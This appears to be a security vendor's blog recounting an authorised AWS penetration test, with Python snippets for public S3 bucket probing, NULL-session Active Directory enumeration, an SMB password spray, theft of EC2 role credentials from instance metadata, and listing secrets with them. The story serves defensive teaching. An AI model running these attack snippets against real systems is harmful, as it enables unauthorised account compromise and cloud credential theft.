At Rapid7 we love a good pen test story. So often they show the cleverness, skill, resilience, and dedication to our customers' security that can only come from actively trying to break it! In this series, we're going to share some of our favorite tales from the pen test desk and hopefully highlight some ways you can improve your own organization's security.
Rapid7 was engaged to do an AWS cloud ecosystem pentest for a large insurance group. The test included looking at internal and external assets, the AWS cloud platform itself, and a configuration scan of their AWS infrastructure to uncover gaps based on NIST’s best practices guide.
I evaluated their external assets first, but most of the IPs were configured to block unauthorized access. I continued to test but did not gain access to any of the external assets; with cloud, once access has been blocked at the platform level, there is not a lot a tester can do about it. Nevertheless, I continued to probe for cloud resources, namely S3 buckets, AWS apps, etc., using company-based keywords, for example: companyx, companyx.IT, companyx.media, and so on. Eventually, I found S3 buckets that were publicly accessible on their external network. These buckets contained sensitive information, which was an immediate action item for the client.
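Bucket discovery like this often comes down to simply testing candidate names. Here is a minimal Python sketch of that idea, assuming a hypothetical keyword list and unauthenticated HTTP checks against the S3 endpoint (not the exact tooling used on this engagement):

```python
import requests

# Hypothetical candidate bucket names built from company-based keywords
candidates = ["companyx", "companyx-it", "companyx-media", "companyx-backups"]

for name in candidates:
    # Public S3 buckets answer on a predictable virtual-hosted-style URL
    url = f"https://{name}.s3.amazonaws.com/"
    resp = requests.get(url, timeout=5)
    if resp.status_code == 200:
        print(f"[+] {name}: bucket exists and listing is public")
    elif resp.status_code == 403:
        print(f"[*] {name}: bucket exists but access is denied")
    elif resp.status_code == 404:
        print(f"[-] {name}: no such bucket")
```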
My next step was to complete a configuration scan of their AWS network, which provided complete visibility into their cloud infrastructure: the resources that were running, the roles attached to those resources, the open services, and so on. It also gave the customer valuable insight into the security controls that were missing based on NIST's best practices guide, such as unused access keys, unencrypted disk volumes, keys not rotated every 90 days, insufficient logging, and publicly accessible services like SSH and RDP. This scan was done using Rapid7's very own InsightCloudSec tool, which gives customers visibility into their cloud network and helps them identify gaps.
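InsightCloudSec automates checks like these, but to illustrate one of the findings above, here is a minimal boto3 sketch that flags IAM access keys that are stale or never used (it assumes credentials allowed to call the relevant iam:List*/Get* actions):

```python
from datetime import datetime, timezone

import boto3

iam = boto3.client("iam")
now = datetime.now(timezone.utc)

# Walk every IAM user and flag stale or never-used access keys
for page in iam.get_paginator("list_users").paginate():
    for user in page["Users"]:
        keys = iam.list_access_keys(UserName=user["UserName"])["AccessKeyMetadata"]
        for key in keys:
            age_days = (now - key["CreateDate"]).days
            last_used = iam.get_access_key_last_used(AccessKeyId=key["AccessKeyId"])
            last_date = last_used["AccessKeyLastUsed"].get("LastUsedDate")
            if age_days > 90:
                print(f"[!] {user['UserName']}: key {key['AccessKeyId']} not rotated in {age_days} days")
            if last_date is None:
                print(f"[!] {user['UserName']}: key {key['AccessKeyId']} has never been used")
```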
When testing the AWS cloud platform with the read-only credentials provided by the customer, I found they were locked down with a strong IAM policy that allowed viewing of cloud resources only. Despite my attempts to enumerate weaknesses, I found none in the IAM policy itself. This will be important later on!
Hardcoded credentials were found in function apps and EC2 instance data, but I was unable to use them to escalate privileges. After enumerating the S3 buckets with the read-only credentials, I found multiple buckets containing customer invoices and payment data, along with Infrastructure-as-Code files that revealed how the customer managed their automated deployments. Beyond this, I was unable to find any vulnerabilities to escalate privileges; however, I kept all the data gathered during this phase handy in case there was a chance to chain vulnerabilities together and gain access during the next phases of the pentest. Although it was frustrating not to find a way to escalate privileges from the platform itself, enumerating it gave me plenty of understanding of their environment, which would prove useful in the next phase.
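As a rough illustration of that enumeration step, here is a short boto3 sketch that lists what read-only credentials can see in S3 and flags objects matching hypothetical keywords (the filters and error handling are assumptions, not the engagement tooling):

```python
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")
# Hypothetical keywords that would flag potentially sensitive objects
keywords = ("invoice", "payment", ".tf", "cloudformation", ".yaml")

for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    try:
        for page in s3.get_paginator("list_objects_v2").paginate(Bucket=name):
            for obj in page.get("Contents", []):
                if any(k in obj["Key"].lower() for k in keywords):
                    print(f"[+] {name}/{obj['Key']}")
    except ClientError:
        # The read-only role may not be allowed to list every bucket
        print(f"[-] {name}: listing denied")
```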
In the final phase of the test, I tested all of the internal assets that were in scope. These were primarily Windows servers on EC2 instances hosting different kinds of services and applications. I enumerated the Active Directory domain controllers on these servers and found that some of them allowed NULL session enumeration, which means you could connect to the AD server and dump all of the domain information, such as users, groups, and password policies, without authentication.
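For readers unfamiliar with NULL sessions, the domain controller simply accepts an SMB/MSRPC connection with a blank username and password. A quick way to check is Samba's rpcclient; the sketch below wraps it in Python against a hypothetical domain controller address (rpcclient must be installed, and the commands shown are standard rpcclient enumeration commands):

```python
import subprocess

DC_IP = "10.0.0.10"  # hypothetical domain controller address

# Enumerate users, groups, and the password policy over a NULL session
for command in ("enumdomusers", "enumdomgroups", "getdompwinfo"):
    result = subprocess.run(
        ["rpcclient", "-U", "", "-N", DC_IP, "-c", command],
        capture_output=True, text=True,
    )
    print(f"== {command} ==")
    print(result.stdout or result.stderr)
```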
With all of the domain's users in hand, I deployed password spray attacks. Pretty quickly, it was clear there were multiple users with weak passwords like Summer2023, Winter23, or Password1. Many accounts were even sharing the same passwords! This yielded plenty of compromised credentials, allowing me to work through the access levels granted to each compromised account. I found one account with Domain Admin access and dumped the NTDS.dit file from the AD servers, which contained password hashes for all the domain users. From those hashes, several more accounts with weak passwords were cracked.
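To illustrate the spraying step itself, here is a minimal sketch using Impacket's SMBConnection against a hypothetical domain controller, trying one seasonal password across a user list; a real spray would throttle attempts to stay under the lockout policy:

```python
from impacket.smbconnection import SMBConnection, SessionError

DC_IP = "10.0.0.10"        # hypothetical domain controller
DOMAIN = "CORP"            # hypothetical domain name
PASSWORD = "Summer2023"    # one guess per round to avoid lockouts
users = ["alice", "bob", "svc-backup"]  # pulled from the NULL session dump

for user in users:
    try:
        conn = SMBConnection(DC_IP, DC_IP)
        conn.login(user, PASSWORD, DOMAIN)
        print(f"[+] Valid credentials: {DOMAIN}\\{user}:{PASSWORD}")
        conn.close()
    except SessionError:
        pass  # wrong password; move on to the next user
```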
With access to multiple accounts in the bag, the only goal left was to gain some sort of access on the AWS platform. Using the data gathered during the AWS cloud platform test, I first looked at the EC2 instances on the platform and the roles assigned to each of them. Then I assessed which of them I could reach with the compromised accounts that had admin access. I found an 'xx-main-ec2-prod' role attached to an EC2 instance that I could administer through one of the compromised accounts. Using RDP to log in to the EC2 instance, I queried the instance metadata service and retrieved the temporary AWS credentials for the 'xx-main-ec2-prod' role.
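For readers who haven't seen this technique, any process on an EC2 instance can ask the instance metadata service for the temporary credentials of the attached role. Here is a minimal sketch of the IMDSv2 token flow (the endpoints are the standard metadata paths; the role name is discovered at runtime):

```python
import json
import urllib.request

IMDS = "http://169.254.169.254/latest"

# IMDSv2: request a short-lived session token first
token_req = urllib.request.Request(
    f"{IMDS}/api/token", method="PUT",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
)
token = urllib.request.urlopen(token_req).read().decode()
headers = {"X-aws-ec2-metadata-token": token}

def get(path):
    # Fetch a metadata path using the session token
    req = urllib.request.Request(f"{IMDS}/{path}", headers=headers)
    return urllib.request.urlopen(req).read().decode()

# Discover the attached role name, then fetch its temporary credentials
role = get("meta-data/iam/security-credentials/").strip()
creds = json.loads(get(f"meta-data/iam/security-credentials/{role}"))
print(role, creds["AccessKeyId"], creds["SecretAccessKey"], creds["Token"])
```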
With these credentials, I created a new AWS profile and enumerated the permissions associated with the role. The 'xx-main-ec2-prod' role could list secrets in the AWS account, put and delete objects in all S3 buckets, send OS commands to all EC2 instances in the account, and modify logs as well. I proceeded to list some of the secrets in the AWS account to confirm the access I had gained. With this level of access, I was able to show the client how an attacker could escalate privileges on their AWS platform.
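As a sketch of that confirmation step, the stolen temporary credentials can be loaded into a boto3 session and used to list secrets; the credential values below are placeholders for the ones returned by the metadata service:

```python
import boto3

# Temporary credentials for the xx-main-ec2-prod role, taken from the metadata service
session = boto3.Session(
    aws_access_key_id="ASIA...",          # placeholder values
    aws_secret_access_key="wJalrXUt...",
    aws_session_token="IQoJb3JpZ2lu...",
)

# Confirm which principal the credentials map to, then list what we can see
print(session.client("sts").get_caller_identity()["Arn"])

secrets = session.client("secretsmanager")
for page in secrets.get_paginator("list_secrets").paginate():
    for secret in page["SecretList"]:
        print(f"[+] Secret: {secret['Name']}")
```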
In the end, this testing highlights just how vast the attack surface of a cloud network can be. Even if you've locked down your cloud platform, the infrastructure assets could still be vulnerable, allowing attackers to compromise them and then move laterally to the cloud platform. As organizations move their networks to the cloud, it is important for them not to depend solely on the cloud platform to secure their network, but also to ensure that their individual assets are continuously tested and secured.